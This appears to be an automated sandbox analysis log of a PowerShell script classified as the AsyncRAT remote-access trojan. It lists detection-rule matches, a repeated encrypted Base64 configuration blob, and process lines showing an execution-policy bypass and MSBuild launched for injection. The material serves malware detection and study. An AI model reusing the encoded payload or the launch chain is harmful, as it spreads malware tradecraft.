Source: 00000007.00000002.4095873239.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1658041352.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.powershell.exe.55484c4.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.powershell.exe.55484c4.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.powershell.exe.55484c4.1.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.powershell.exe.5538044.3.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.powershell.exe.5538044.3.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.powershell.exe.5538044.3.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.powershell.exe.70a0000.6.raw.unpack, n5Dh00mp5s.cs Base64 encoded string: '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
Source: 0.2.powershell.exe.54caf50.0.raw.unpack, n5Dh00mp5s.cs Base64 encoded string: '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
Source: 0.2.powershell.exe.54bbe38.2.raw.unpack, n5Dh00mp5s.cs Base64 encoded string: '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
Source: 0.2.powershell.exe.55484c4.1.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.powershell.exe.55484c4.1.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.powershell.exe.5538044.3.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.powershell.exe.5538044.3.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.expl.evad.winPS1@11/11@0/2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1492:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: \Sessions\1\BaseNamedObjects\1z82HQuLhx64iICU
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ua1y2w2.dx2.ps1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\185.7.214_1.54.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\185.7.214_1.54.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xe5lczmk\xe5lczmk.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9F03.tmp" "c:\Users\user\AppData\Local\Temp\xe5lczmk\CSC16FE68AEE00E4CCA95C4EFA3D7C4CD.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xe5lczmk\xe5lczmk.cmdline" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9F03.tmp" "c:\Users\user\AppData\Local\Temp\xe5lczmk\CSC16FE68AEE00E4CCA95C4EFA3D7C4CD.TMP" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: mrmcorer.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: efswrt.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: wintypes.dll Jump to behavior
